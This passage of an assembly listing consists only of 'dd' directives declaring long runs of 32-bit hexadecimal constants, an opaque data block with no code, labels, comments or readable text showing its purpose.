dd 5E5B265Ah, 99A4394Ch, 6CFFC63Bh, 0CE6C86EFh, 0B39AA413h
dd 2D79893Bh, 40300BCFh, 7B0B380Ah, 0B230020Eh, 0AA4459DDh
dd 32648613h, 3EE789C3h, 75053CBEh, 0A27D31C9h, 6EB53E31h
dd 5C85BAF4h, 8DA3866Dh, 0AAB97802h, 76FB45CDh, 0E33EEEBAh
dd 0F9D88799h, 0BDA69B71h, 1B7278E0h, 1E76DB11h, 6816A27Bh
dd 370C3B64h, 0AC7332F5h, 0C87C8B3Bh, 0E48AE6A4h, 346C7247h
dd 3C34AA42h, 0EC8AFDA2h, 0FF953164h, 5DC47CE7h, 0D92A35CBh
dd 4D8D8ACAh, 0ADF739FBh, 4F112CCEh, 7ED715C5h, 0E16A44A2h
dd 0D9502620h, 0FA7D4A35h, 0A61DA0FCh, 0B9658C99h, 0F2E1BA98h
dd 0FA19767h, 77DAF5B8h, 18E3B451h, 0BAEAA8D3h, 69E3834h
dd 578F1958h, 4833F244h, 2E708401h, 7DE09A31h, 0CCD6F05Eh
dd 0A7959798h, 40D951DFh, 0C50EC40Eh, 0D9CAEAFEh, 0EB4647DDh
dd 60B07217h, 0BE3714C2h, 0EA466944h, 0BCA69CF6h, 9413EE91h
dd 0A2395BBAh, 0CB9A0177h, 2CC4D3A2h, 46A0443Ah, 5EC26E51h
dd 0BB0DB668h, 1356EF3Fh, 2F61A301h, 13352E0Ah, 0C3BA6C04h
dd 9A480FCAh, 8A46CA00h, 0E86F07D6h, 0C5108A96h, 241093DBh
dd 0CC22812Fh, 0DE53E56Eh, 0B92DE77Dh, 0D6E7E189h, 406D6274h
dd 8BEFBC3h, 0C7746A64h, 7499B16Ch, 3865BF01h, 692239h
dd 3D1523A4h, 778336Ah, 0CF2AAFFh, 9D125A3Fh, 85356A88h
dd 0C4373975h, 0B508F268h, 32845E21h, 0CD71638Ah, 4B133894h
dd 0E21FDF9Fh, 2672C71Eh, 0C67979DAh, 0E1BA5C36h, 0E555EB19h
dd 0E8355F84h, 0AB6C6A6Bh, 4C9213E4h, 373A754Dh, 2B203621h
dd 7AEA96Ah, 24183B11h, 3C2FB692h, 8D3DF3D2h, 21DF1708h
dd 7DA0BE4Ch, 903E57DFh, 9D5ED9CAh, 5E261FC9h, 0D2C63A36h
dd 973AEC2Bh, 329C9C2Fh, 0D70804h, 0F4833EF5h, 0A307C9CCh
dd 0D7BC4C2Bh, 995D8A5Bh, 884820AAh, 9F8CED19h, 0AA32C2AFh
dd 23CE0FA7h, 3276AD38h, 4CFCE91h, 8654EF51h, 0CA643220h
dd 1A1FC1ECh, 0C3DBAD19h, 4738C932h, 562EF834h, 749A3E9Fh
dd 0BF7CBB3h, 0C33AD02Ch, 95F69675h, 53108702h, 775913AFh
dd 9B094A89h, 0F312480Ah, 0EB6EDA13h, 0DEB40473h, 4B274EBCh
dd 249DE501h, 2079444Dh, 613E7654h, 6C482616h, 99DF0707h
dd 0E72CE7ECh, 0B8C76604h, 844C345Bh, 1C4FBACCh, 0FAF49F82h
dd 8318FE1Ch, 865F854h, 39AAAFDEh, 52465C22h, 0B7B584BAh
dd 528C1EF5h, 409D828h, 0EA59EE8Eh, 0F9E65FF2h, 0F999D7EDh
dd 0E3A3AE6h, 4C334B2Fh, 0E2EE1B96h, 32524222h, 0FC9F0E37h
dd 54E13A1Eh, 7E623F08h, 932F8A7h, 4176D4F9h, 14F814F2h
dd 0E13E9CDh, 8F80866Ah, 44E244D1h, 9343E000h, 8B8DE607h
dd 5F50F89Ch, 664CA8C7h, 9B7001BCh, 433599F8h, 0FF2790A9h
dd 88F112C3h, 6D63CDD8h, 3F9D9209h, 5A9AE3Fh, 24A4FB3Ch
dd 7083DCF9h, 0FA8FD5DCh, 0FA1DCEC0h, 0FBACB7D1h, 3FCA42FCh
dd 2981A2C3h, 37680852h, 79FC644Dh, 0CB399948h, 832D5AF6h
dd 692A068Eh, 520466Ch, 3E05399Eh, 25E6C6AEh, 2AA8CCE0h
dd 7020ABF7h, 8B4F6ABBh, 0BA24A05Fh, 0F1D8E441h, 8FB2D2ADh
dd 991BF14Eh, 0D786B2DDh, 0A335AD22h, 650F19B4h, 0C35759F1h
dd 0C15B39BCh, 0FEC59017h, 2AC97A67h, 0A73B887Ch, 9EBD51B6h
dd 3533BC1Ah, 7F97AC98h, 97CCD137h, 235D0DF8h, 0E05C0DA9h
dd 46465563h, 0FA213F6Ch, 0C051B648h, 1CDEC881h, 0B04FE4Ah
dd 0DF32E85Eh, 2D1B5D20h, 0C5892FCBh, 6EC63DE4h, 798C22E9h
dd 3FF0D6ADh, 64BB2B7Bh, 9DAAA4C0h, 57AC7C4Ah, 5B4F9DE9h
dd 0EAAF690Bh, 0A7E1E302h, 0CAAD5F02h, 4C61A138h, 737A150Ah
dd 0F18E707Eh, 3BFAA4C4h, 4D90CF54h, 2A8E06E2h, 0AAB1F116h
dd 7C8830Bh, 7EC718D1h, 0B2D55424h, 39E5C6AEh, 90C3F168h
dd 84023B90h, 0B0BFE3E6h, 20D5E00Eh, 0CAC3F1BFh, 0D08C142h
dd 0A4D4427Eh, 3987AF2Bh, 1B01A454h, 2AAF6156h, 0A7B6E357h
dd 0F6C7D098h, 0F279630Bh, 46776D02h, 0A558A6C9h, 0D5784EBh
dd 0B9212D10h, 8D7BB3E1h, 0A1836234h, 0F3AA0291h, 0D8B30A7Eh
dd 2E521630h, 80AB2B32h, 0A0518F4Dh, 0B65489CFh, 87A1A506h
dd 72452800h, 0A4B77BC1h, 35522A9Eh, 0CA51F3E9h, 0F9FA88B7h
dd 3361E379h, 0CE1711B1h, 8FB51D4h, 0DC0CD411h, 0F689C7BEh
dd 0FEE99F96h, 0EDC7CE0Ah, 0FF2758B6h, 0F4A3BCA5h, 0F00FB967h
dd 0EE5A668Fh, 8E86E4E6h, 6DCAFB54h, 8070801h, 0C5A571BCh
dd 4527FAEEh, 0BB07AF78h, 7E9075C0h, 97327E21h, 3908BCEAh
dd 0C38B62C0h, 273A41F9h, 0E71AAC9Dh, 1CB870AFh, 0B960AF4Eh
dd 62E744CCh, 0C2D5F312h, 97044946h, 24662753h, 7010C3C7h
dd 9A7DA419h, 7CB05432h, 0BAF89AFBh, 71490D65h, 3BD6D06Eh
dd 80343333h, 0B5750BBEh, 0C28062A4h, 2360D43Eh, 5920D009h
dd 0CDA1C3DAh, 49E38E88h, 8D922E02h, 0E9480771h, 199DA533h
dd 0B3193FA3h, 90090D3Ch, 22282F9Fh, 16033451h, 2D184C3Bh
dd 1D017140h, 906B4166h, 64FB91D9h, 9CA9A00Eh, 1014C56Fh
dd 7385CB8Fh, 0C791BADFh, 65D87AEEh, 54C1E30Ah, 450CA258h
dd 29726567h, 0EDF240D9h, 0E541DC9Bh, 68EFE4D4h, 0F9A25ED6h
dd 0CA1E21F5h, 38FE7527h, 6F151146h, 5A7C67D0h, 625F2199h
dd 386D6F74h, 251BB2C1h, 806559FAh, 0FC4CCDF2h, 0C6C21CD9h
dd 0BF6C6166h, 0F4506519h, 41DBB16h, 4AA3459Fh, 0D9EF53F6h
dd 346B35B5h, 0BE2C0D97h, 47954214h, 0DECEE9E8h, 70D6E0D0h
dd 31E8E03Ah, 0EDF96EF1h, 0EF3EFB4Dh, 0B3193E39h, 0D777EEC1h
dd 0A989746Eh, 64A6EE0Eh, 40BC1817h, 3B519199h, 39664834h
dd 0AADED54Ah, 0CBBF6515h, 0F9A4EF31h, 0C352DCCBh, 1411FFB1h
dd 38F1DF14h, 7446BF2Dh, 0D6BED149h, 6D56CB0Bh, 398F11D3h
dd 6FCE021Ch, 147CB3B3h, 9354713Ch, 0C3AC86E2h, 0E693BA80h
dd 8BED2910h, 65D45011h, 0D2D9C970h, 4ED5BDCh, 0C0504724h
dd 1127C514h, 88A2085Fh, 800CF5BEh, 0D02F9051h, 0A80EEF51h
dd 0FE65840h, 715B4927h, 3F1FC412h, 0CC173B0Bh, 71068AA8h
dd 0AAA0ED4h, 1002ABAh, 604C870Dh, 34296A4h, 0ECA6410Dh
dd 0D978653Ch, 7960F46Ah, 0ED0BE499h, 84EB5AD9h, 0F9BEDC6Ah
dd 0AD6763E2h, 81873DE5h, 90EA5B1Ch, 0E42F3C8Dh, 97D0DB67h
dd 78B86337h, 79C40BB0h, 2A449C07h, 45DE1442h, 32147A37h
dd 91AD3084h, 0B46AFDB8h, 7C28AC50h, 0AC22AD6Ah, 82C158Eh
dd 0B94759D6h, 0D10F8A3Bh, 1D2C3317h, 0BF33358Dh, 0ED88D48Ch
dd 2CFEE6E9h, 7D11E5F6h, 2F69F424h, 7CA7D00Dh, 0FFA2F6B5h
dd 0D9D4F8F0h, 4B04A356h, 9A23125Eh, 8B446EE9h, 9B267E0Eh
dd 866D6AE5h, 248B56D9h, 5F4DB14Ch, 0BD892570h, 52B7C612h
dd 0B40193EEh, 7130031Ch
dd 6249C3D0h, 5495442Ch, 0F9DDDFF9h, 24F5E1A3h, 43B1E8F8h
dd 0DEE62859h, 0E49E964Eh, 0E9E69E7h, 658FA2B9h, 22BE6524h
dd 0A6F5BC09h, 7252C2E4h, 4F56518Ch, 2B9ED84Ch, 2FFFDCEBh
dd 0E60029D4h, 8D6CC926h, 2B4D1E87h, 0C520AB74h, 8FB1892Eh
dd 0C57842Ch, 0F3D6D46h, 0B87FCF38h, 5A526A5Eh, 0FA61004Fh
dd 11D6411Fh, 5C0E00C8h, 0A566E3ABh, 83F5B5A2h, 0D57BA87h
dd 0B426AC14h, 9EF1B9Ch, 5728F77Bh, 0E10ABAC2h, 3B334F73h
dd 34784080h, 8D80602Dh, 63512932h, 594E499Ah, 6C9DF9B6h
dd 0A1B1EEB9h, 0F79E7AD7h, 0DFCD9C2Dh, 0EC1D99F0h, 0B6859E60h
dd 5E92A1F9h, 7550A8h, 4D09380Ah, 0BF355752h, 0DE543F9Ah
dd 888F6BF3h, 0B4564B41h, 0D94920BCh, 1DE5B15Ch, 61943A44h
dd 1A992272h, 0D6DBF5B2h, 6818CF03h, 76399A79h, 8234AD34h
dd 0F96E4EF7h, 613F22A7h, 8BCB30A3h, 4C923E44h, 0F4F39249h
dd 99CFE0E8h, 2471EA8Fh, 1FCC0DACh, 1AA77B08h, 0D16C704Dh
dd 5E90C5C9h, 839E7929h, 51FDA09h, 0A9470FBDh, 1200250h
dd 66C426B1h, 3F02612Ah, 2AEE36B5h, 33DC6252h, 78E2D283h
dd 847A8CF9h, 1F29C693h, 39CCDCFEh, 0FF49DA47h, 0EFA97314h
dd 3C95C730h, 0BDCA7DD5h, 0BD1D59E6h, 0FDA34EE7h, 6923C120h
dd 0C5EE99BFh, 0EE3DC6Ah, 76BC0B9Ah, 0BAB31BEEh, 9CC28AD7h
dd 0A4CE9813h, 7A319FF7h, 0C215CF8h, 70285FA3h, 0CD01DD07h
dd 0C665B65Fh, 2FEC74A1h, 7BBA1FBEh, 0E6FF022Bh, 0BB101CA2h
dd 5A37BB09h, 0F0B6EE5Bh, 0C669B596h, 0AE25CD33h, 3A5D6B5Dh
dd 905B63E3h, 0A41C7EB0h, 51872B4Ah, 7717C0A4h, 0E5A78F61h
dd 1759CB8Eh, 0EB702497h, 30FFA09Bh, 0A4147B75h, 0C1A89A1Dh
dd 0CC3A5A20h, 24695CC0h, 219E3D41h, 230AB178h, 0D29B8B14h
dd 9446634Eh, 958A456Ah, 24460C28h, 362CF397h, 0D96FF8FAh
dd 0E140B1C8h, 0AC35BC2Dh, 0DCC8D19Fh, 8CA8A5B2h, 0A18B004Dh
dd 0F7291DF2h, 4B0296DFh, 3E3923E3h, 0DE0DF61Dh, 0BEFBC0D1h
dd 5987300Bh, 0CD75844h, 54D8F811h, 8BF92E4Ah, 0B7EEA0BDh
dd 3507F24Ah, 2CBDA78Bh, 0E0FA5CD6h, 25D4E909h, 5914B88Ch
dd 0D935E432h, 57F1C84Bh, 2E277FDh, 0FA57499Fh, 93C4F58Ch
dd 4A8FA90Dh, 0B57318ABh, 0C9DEE9B2h, 23602D9Dh, 1232BEB6h
dd 59FF9B74h, 0A120FD9Eh, 0EE045B07h, 56C1A58Bh, 0DDFF3B69h
dd 0E4C7733Eh, 0AFB5525Dh, 0BDF0E342h, 683B520Eh, 73C32E9Fh
dd 9A45F833h, 0E49A7344h, 56386A93h, 802F7B2Ah, 0EA24FBBAh
dd 1CE0572Bh, 0ABE26BB8h, 0C4E50C33h, 0E8E8ECCBh, 12EC7CD7h
dd 0BAB557BDh, 526026ECh, 1679714Ah, 57B50AD3h, 7AE8FC7Fh
dd 4F84C836h, 2CE64FC1h, 60AE731Ah, 3C1A0B00h, 5462C302h
dd 78A30117h, 5C581E6Ah, 427F70CEh, 5240DD14h, 0B307B2D0h
dd 50AD5B05h, 8FB90BAh, 190DE298h, 62C3D757h, 0A2C99E93h
dd 53C1A8C6h, 2C04AB27h, 0C2048805h, 1534B91Bh, 722E71B5h
dd 0D1049359h, 5850CB8Eh, 10D1D5AEh, 997B241Dh, 32A2A19Dh
dd 48C7CAC2h, 9828BB2Ch, 4DCFDD48h, 0DFD91F2Ch, 2D0F002h
dd 0D261FE6Eh, 67B7BF64h, 7CA6A256h, 4E7D786Bh, 0C2CC54Dh
dd 220F36EAh, 0A2A9DD8Dh, 0F241986Dh, 113C4668h, 5FDD7474h
dd 0BD0361E6h, 76954F34h, 0F2EAD37Dh, 64250AB3h, 0C7E83Fh
dd 13E5FCF0h, 57DB3A28h, 0A18902A8h, 9CE5C980h, 7CA5089Fh
dd 10757D00h, 0A61A69EEh, 1F0FFE1Eh, 8840062Fh, 0BDACECD8h
dd 6F0BD616h, 0AC43C742h, 0F6FF172Fh, 2087C4D8h, 5DC97552h
dd 5ADBB144h, 574762ECh, 46312ACDh, 0F7E8EE5Ah, 59674C96h
dd 89696CC5h, 9E49BBFCh, 5CA2C849h, 818DF7F5h, 7B6DC64Dh
dd 0C75A41DDh, 2B2403D1h, 65EF310Ch, 0DB9D06CAh, 0E3C7D118h
dd 9CD946E5h, 6E946013h, 0B2D7DE72h, 0F5D22CADh, 77ACD921h
dd 4BF7E77Eh, 13E0013Ah, 0DBCDA784h, 0ED0B9454h, 71965C35h
dd 3C11B1CEh, 0BCF14F7Ah, 3841D680h, 0A4F2D30Dh, 6309077Dh
dd 0DDA60889h, 8755645h, 3EAC1EF7h, 1ABE57E6h, 0C1B727CDh
dd 4BE4DB6Ah, 0F8D6AE66h, 0C726D2A7h, 0B4B5A384h, 117FCCDBh
dd 23BD5CDDh, 3A6827EFh, 1FD66706h, 0FFAF0FB3h, 4DADCC6Ch
dd 1B409E06h, 20A724B3h, 95F56F1h, 0A81413A1h, 0E6A89F01h
dd 9BB3D2C0h, 0D8D8713Ah, 7D7BD4D0h, 587EC3EDh, 0EAF612C1h
dd 64BA3D47h, 93D3A122h, 17B131D3h, 0DBAFD625h, 40139AEDh
dd 967171A0h, 8F29CE3Ah, 0B74C4242h, 0C687094Dh, 0EEA0E8DBh
dd 73DBC549h, 4FE8B8F9h, 0F61694E3h, 3D729AA8h, 7F4A1DBBh
dd 86FBE1D7h, 4B0E9366h, 0EA02B6D6h, 91F0E959h, 36C1EF1Ch
dd 0F4579209h, 29399A51h, 6537B1C8h, 0FC14BA2Dh, 3E829ECh
dd 0B2A9C233h, 0F8FD5F41h, 74EEB017h, 0A43A6143h, 0ED52190h
dd 0A39BD8A1h, 6395FC06h, 6875D157h, 0C0670443h, 43315EC9h
dd 0CB214E7Eh, 0FFD04319h, 0E9E3A65h, 3ACC3A7Bh, 1D2BE584h
dd 1A2BF38Eh, 740A6C4Dh, 6BB4CDF1h, 7AE4BD9Bh, 56423CE1h
dd 8AD60C64h, 0A069423Ah, 71C1ED53h, 9DD94E31h, 65A98C68h
dd 59681504h, 0F9C1100Bh, 0F056A228h, 88E4EC90h, 1F73D94Eh
dd 0DE703DFBh, 8C4F9C0Fh, 6E20C44Dh, 74C9394Fh, 87147659h
dd 0C323BB80h, 8DA69B3Bh, 486E8B6Bh, 208BEB31h, 0F8EA4610h
dd 6BE2BC5Ch, 4BD281CAh, 0A016B85h, 22B7E719h, 1C33C4BFh
dd 3A845179h, 4E422F66h, 8E0DD23h, 0FE4D036Eh, 76113D50h
dd 8350FFB7h, 0CF8D9126h, 0E75E97C4h, 53A4EE61h, 82453BA0h
dd 0BB89F966h, 0C33A941h, 0F0D928B3h, 2AA1C513h, 977794h
dd 0FE3817F4h, 0CD5FCE5Fh, 8F0A856Bh, 0D37C66Bh, 63BA7185h
dd 0E3979198h, 0AD8656C5h, 94213D80h, 13F69E2Ch, 0E8449AFAh
dd 75382E71h, 617D1607h, 0F282BCF6h, 32B538C2h, 9E4DB4F6h
dd 1DC1CCBEh, 0BD47176Ah, 36990AAEh, 64DFE4F1h, 97C000DCh
dd 88E097F8h, 69B8BF3Eh, 46C616Bh, 50FC3AB0h, 0A10CF10Eh
dd 79B9852Bh, 62C9FADh, 0F0BC0B80h, 771D48F2h, 75AB4BE4h
dd 0AF6AB9D6h, 435A5F87h, 0ADEABC56h, 10C74D5h, 6AEFC55Bh
dd 3CDB690h, 71254389h, 456355B8h, 0EFCFA850h, 0E5F23481h
dd 0D9B6779Eh, 0C5A3D343h, 0CC7FC927h, 6D9C3913h, 324CC19h
dd 23F14EABh, 1A57BA20h, 43900C4Ch, 0C27C8DEFh, 0BD42DFC3h
dd 0AEC9C2C1h, 23546F26h, 741654A0h, 14652689h, 29E1C19h
dd 0BCFF919Eh, 0D5F8AE2h, 793A9FC9h, 6C6CF6D1h, 0AFA526C1h
dd 83B1DC14h, 1CA677C7h, 0FA73E556h, 0A1B5147Eh, 450EC5E9h
dd 1B9F19F5h, 204556C3h, 631C7443h, 5C656459h, 114EE46Ch
dd 0F96C3738h, 0ACA9B686h, 2EB0CA2Eh, 6C09E78Ah, 0F569DED7h
dd 0E8646354h, 0E3BBB2CAh, 16A9A4F3h, 7A25CECAh, 9D65A771h
dd 98B6EB06h, 0B31669E7h, 0B5834A07h, 0CA3C1A02h, 77E2A4CBh
dd 19447A8Dh, 0EE5775D8h, 0A98DD91Fh, 6831B60Dh, 4ADF987Fh
dd 0EEF74B39h, 3070704Bh, 52F29D4Bh, 1F082E82h, 5E41D5E7h
dd 53279FA5h, 0DF7EB680h, 6BFDA11Ch, 0A88A1845h, 48EC27BAh
dd 0EE4774AEh, 241E0D0Fh, 150E1EF4h, 522C067Eh, 0F746A81Dh
dd 702497F6h, 4D4784AAh, 0ECEEFF80h, 0E5BF4B04h, 846EFDF1h
dd 481FD65Ah, 9C8A7CA2h, 29ED27D6h, 0B7C3C3F7h, 0A93A4D77h
dd 0F9AF1B9Eh, 0A0E09B73h, 0D367725Ah, 0C0544D14h, 95338EB1h
dd 0EEC8A36Bh, 0CCA5B5Dh, 0EDEFE62Dh, 0AEAE39BFh, 0E38E73DFh
dd 23D9076h, 0BD5746Ah
dd 0FFEAFE46h, 6369EFABh, 0A11DD8E1h, 361D6D79h, 0CC486939h
dd 0F33D08F4h, 1BF0314Dh, 53A6E05Bh, 475E4557h, 880A3BF9h
dd 94ED6121h, 7D88B39h, 30B117A3h, 0AC2876C8h, 704C8810h
dd 4FB1FEB2h, 0EFC9D747h, 0A2BE103Eh, 68671F8Ah, 79129ACAh
dd 1C9E54FBh, 3EA12168h, 217E54FAh, 3E61BC7Eh, 372D99F8h
dd 4CF9B0Ch, 0F33B3DBBh, 0DE79292Eh, 65C3ABFFh, 736B0C78h
dd 4E11E8D2h, 0F7F95047h, 191673BDh, 1257E43Bh, 5C71346Eh
dd 0A5AA074Dh, 2DAD609Ah, 562324D2h, 0D97B8FD7h, 18F33CFAh
dd 2FF7273Fh, 78A8AF1Ah, 6ED11413h, 6B4D16EEh, 0BCFD9BF3h
dd 2DC20645h, 8EBF70F4h, 0D30238F7h, 49321CDBh, 3F30CC15h
dd 0A20EE98h, 0DABBCC4h, 67ECFBB9h, 3E150EC7h, 0FA1B1E61h
dd 3E261E28h, 9295F9F0h, 3EB2E21Dh, 0D3BBF373h, 0EAA42F56h
dd 96E35FB6h, 34A0BF88h, 3D320364h, 3C5BAE5Ch, 0F4426D48h
dd 8E8775F9h, 822F5D7Fh, 844AB87Ch, 0A3EC832Ch, 8935D74Eh
dd 167A58ADh, 4296EDECh, 93ACBDB6h, 54F2210h, 9C31850Ch
dd 90A34F8h, 93B84B7Dh, 0F23512DDh, 2FAD4A35h, 0F711FF78h
dd 2FE8EE0Eh, 0F7945FBFh, 3BCA8816h, 2616AA1h, 0E7BB8919h
dd 0A439BFE7h, 0C819F66Fh, 7A82469Fh, 9C7C3522h, 0E82A2057h
dd 0FC296B56h, 2CFC182Dh, 1212FD1Fh, 0C55327C8h, 0E20A318Ah
dd 8AED959Eh, 0C9C54BA3h, 1627B64Eh, 7E7A78C1h, 188422CEh
dd 0A59C3C51h, 0F51F297Ah, 76FB7320h, 54B679E6h, 0E2C56A27h
dd 16552D4h, 5DCAF01Ch, 0C47EFDA8h, 6A3CE782h, 0DD297A84h
dd 3451C091h, 89EB7699h, 85022F5Bh, 3B3BB45Ah, 233637DDh
dd 9372A3AAh, 0A33F6271h, 95E70256h, 0CF9B6ACFh, 0A053841Ah
dd 0F735114Ch, 0E39F510h, 7864565Dh, 0B74982C1h, 0DBD6E9D3h
dd 3351BE62h, 105C3668h, 2A9EA8FEh, 64A01C0Ah, 2B04E289h
dd 0D137CA4Dh, 0D1F82D2Dh, 0EDF780D2h, 0EB085A27h, 7F441D26h
dd 5872EB98h, 0A35D7373h, 490A5FF8h, 0FF6995CBh, 4BE4C2E5h
dd 72950FA0h, 9B3EC385h, 0F5585F64h, 2295FA3Dh, 53B29771h
dd 30316299h, 1CB1511Bh, 0A2994798h, 873E5CF0h, 0B77AC8A0h
dd 8C07B577h, 0A83BBB0Dh, 673C2F7h, 0F9D51EFBh, 32647F2Ch
dd 54AD7E79h, 0CEC19CF4h, 0A2664C6h, 4BC46E7Dh, 0A8453741h
dd 0D1AED798h, 95882025h, 2569CDE6h, 0DB91122Dh, 0E60175FDh
dd 50491529h, 6073F1C7h, 139C5093h, 37FD7D67h, 342A183Ch
dd 0AF673596h, 0AE554309h, 0A6595A61h, 29DC72C6h, 5A989DD9h
dd 0A15A2E90h, 0EF669FF5h, 6A3F9501h, 0A9D9575Eh, 0D32E2A6Fh
dd 4DF87615h, 5467B583h, 459AF8Bh, 86DF4999h, 56A36DEBh
dd 77400133h, 81600F9Bh, 403D0A75h, 3B949B9Ah, 9299B01Ch
dd 0FC7F0723h, 0AF133BE5h, 5F508F0Fh, 2B7BACBEh, 7AE7D8D5h
dd 3C190E50h, 891153E7h, 0B709279Eh, 6841D796h, 0CE7D73DBh
dd 7E844D0Bh, 0F04B210Bh, 0E731B4ADh, 0FCBEB9AAh, 3AA8D2BFh
dd 0ECBA32A6h, 1EEF16D1h, 3FBF7F3Dh, 0D545DFFBh, 8EE12A5h
dd 8F76E834h, 91A324A6h, 477840D1h, 7FCD7864h, 9C6D4143h
dd 95654745h, 22F0E0A9h, 95B1DE15h, 0F8F8C97Bh, 0B79CB6Bh
dd 0B83D1489h, 0E184CDDBh, 96C1BA32h, 0DE7FBA6Eh, 1D24DA65h
dd 22647CC0h, 5D1005A3h, 0C17A9A8Dh, 11B70EACh, 0C6DA6F28h
dd 96EEB3AAh, 7A90248Fh, 2908B565h, 0FDEB3C90h, 7A5B49AAh
dd 102C7640h, 619F5E4Ch, 80BAA470h, 0F8912739h, 0EB647B57h
dd 912C74Ah, 3ADD4843h, 0BF794C7h, 52850678h, 0E87FE23h
dd 964F9E8Ch, 29E64C58h, 5D02C313h, 81761046h, 772B16B0h
dd 0B21865Ch, 2DD1D6B6h, 288416F2h, 7CDA9985h, 0F3248F48h
dd 2AA59C77h, 2C438C14h, 5EFB7325h, 66E60DA1h, 257BA9C0h
dd 401A452Ah, 816605D3h, 887D2946h, 4770DA11h, 0D1F4F955h
dd 7A62CA7Dh, 0AF95F7DEh, 0EAA6D158h, 0A06926FCh, 34762D90h
dd 0E3E3EFFFh, 4FCE5689h, 0FEDC798Ah, 1E47464Fh, 1F3423D5h
dd 2954BFCDh, 0FA2E3D3Dh, 209DE738h, 759C6E1Ch, 0EB3E6EA4h
dd 14B97313h, 9FE806C8h, 0F3066FD4h, 96B1CFF2h, 505A64CAh
dd 0D9455365h, 0F8896382h, 7B833998h, 0A276C655h, 704BBF60h
dd 55C0C0A3h, 0A2C69516h, 0D87305D0h, 0BB6AE602h, 0AF9F9E72h
dd 0E24E7A51h, 0A4E1D977h, 476AC0A6h, 53CD510Bh, 0F4677848h
dd 8B6A5A91h, 0C3EA13D8h, 82D69026h, 88C52E13h, 1B6A7A66h
dd 0F817F3AFh, 4618CDE3h, 42A9806Eh, 0E86F4CD1h, 0B5B6C59Bh
dd 950D35D0h, 957D3B96h, 0A9E8D0Eh, 0BC723420h, 9F8A2BBCh
dd 0DE26212Ah, 54AD662Fh, 0D538E2BBh, 638FCD1Ah, 6CB979CCh
dd 82331277h, 0F0C2D09Eh, 968883F8h, 0E85543FFh, 6BB925CAh
dd 2D2F61B7h, 0CC0A5DD4h, 0F775B852h, 3F0D0E5Eh, 486BF06Ch
dd 0E472DC08h, 0C41D12A9h, 0C3509D50h, 0AE6CF305h, 80F438B8h
dd 0BF3791Bh, 2CAD1B3Dh, 7FD6E5B8h, 5C3C83E2h, 577A686h
dd 481F288Dh, 0CA285B51h, 5D5E4D85h, 1C1CEDBAh, 99E81458h
dd 0E0F4F936h, 8B5D561h, 0BD74282h, 3983B69Ch, 368537DEh
dd 0A9F8BA41h, 373E5924h, 2AF6EEDFh, 51760B88h, 2D5D65C5h
dd 0D47B14B2h, 419A25Eh, 0A420CC3Eh, 0D088C152h, 0D7F152C3h
dd 6B0B32EEh, 2F813CB3h, 1B216993h, 0D19F585Bh, 27070C9Ch
dd 96ABDA95h, 638FF24Ah, 0C7B96557h, 535579F9h, 9A3358E8h
dd 9BBC663Bh, 0CA0899B9h, 1BB0D41Ch, 0C80633B3h, 79DD398Ch
dd 46AA82E7h, 6E2B9FD1h, 0D11402D6h, 366F2385h, 91660F86h
dd 4B367545h, 0B127DF0Fh, 0D1BAA48Eh, 0EFD6E132h, 78C29BA7h
dd 0FA74964Ah, 78E10C04h, 4536C0B9h, 0BF2A97B7h, 0AB54AA9h
dd 20B875Ah, 9C06878Dh, 39FE92A5h, 0AA8F58C4h, 0DF7C5285h
dd 0AE7BC16Ch, 0E4C2396Ch, 0FA7FA4B6h, 9ECABFAEh, 0BD99D105h
dd 86E7FB4Ch, 436B3DEBh, 0B32CAE07h, 86A012F2h, 836A5E5Dh
dd 0D9655FE8h, 7C4EDE79h, 0FF5832CCh, 83EC530Eh, 0B4181810h
dd 2F72D497h, 0CF30DCBDh, 0AF7A2341h, 6B138D91h, 21DF75Bh
dd 13205E78h, 0F446430Bh, 5C0854ADh, 445D3302h, 153858DBh
dd 6F87892Dh, 0C28BA59Dh, 0A455AAC8h, 35138306h, 0B8CFFE53h
dd 5502A147h, 0E66E252h, 0FD809EE7h, 62A308A9h, 54FF056Ah
dd 89DDF7B6h, 0D419988Dh, 7ECDDF3h, 0B43E4D75h, 0F1C2F5D6h
dd 42455285h, 10E9FD80h, 3413223Ah, 0FC8B487Bh, 12189466h
dd 0E4CECC24h, 3512B06h, 0EE7E5417h, 0B5D8D7BBh, 0E9BB881Fh
dd 2EF7E7C2h, 8E0C0DCAh, 45008342h, 0A738B4A3h, 0A6D012DBh
dd 48E6C71Fh, 0C4271FFEh, 0F60AF911h, 4F37DF03h, 66A0FA1Ch
dd 0FDC38561h, 9FE4636Fh, 42E4F311h, 8F22EEFh, 7495FDBAh
dd 9432A78Ch, 3896A62Bh, 40B36015h, 2918E18Bh, 55C7D53Ch
dd 0EFD7F194h, 0EA7871BCh, 491E2543h, 0DC35E02Ch, 27082C9Ah
dd 43FDB078h, 7C9139CFh, 4CA216EBh, 13B1C410h, 0C67BC12Eh
dd 8A0698CBh, 0C757ED08h, 56830C71h, 0E88D93C5h, 0F726C516h
dd 7D97D625h, 980EC905h, 0F8EAF99Ah, 0EA5C8C63h, 29E4F4D5h
dd 767FEC22h, 6A1E6A70h, 0FAEE9914h, 90F66C28h, 0C094FD0Ch
dd 8D655F82h, 3A6F04C1h, 8760E2A9h, 964CF96Dh, 0BDA0320Fh
dd 59D99A26h, 0F6A8B5B4h, 0AB10F9D8h, 2B8E8A3h, 79DCA58Dh
dd 0E3145EC2h, 43C490Dh, 519D0E2Fh, 0A13B07Dh, 2F5564CEh
dd 0C18A4356h, 96FA1171h, 0D480C2DDh, 3C63F97Eh, 92D7010Dh
dd 454C6BA5h, 54197195h
dd 16A44914h, 0E7747222h, 8BFC699h, 0F5C13190h, 921841D0h
dd 3BE18C9Ch, 0F25C5F1Eh, 0AE04F834h, 749F5ED1h, 695A5FBCh
dd 0DD80FB3Bh, 6A42710Dh, 44244AD2h, 25BA87CEh, 6AFA588Bh
dd 7651B921h, 757F22CFh, 5897D236h, 883A4EF6h, 2EAAA066h
dd 0E932A1FCh, 0E6AD1220h, 0E6C6269Ah, 0CBAADADDh, 0E1A58D2Ch
dd 21210990h, 16A4A0DDh, 2D2412CCh, 0A36D5309h, 490F0930h
dd 564067D6h, 32C28E8Dh, 0CECFEC29h, 0F19C28h, 9176882Eh
dd 5A137AACh, 0A73905EEh, 7DC6211h, 0FD48005h, 55ED8902h
dd 782ED9C7h, 55478081h, 4CE958D4h, 3892A8B9h, 0CE8DA4B2h
dd 808872A9h, 0EA0C6C9Dh, 0D1E053F6h, 46E533CAh, 0DCD004C7h
dd 0A34EA291h, 747C1529h, 6FFCD589h, 0ADE66994h, 3F57BBDEh
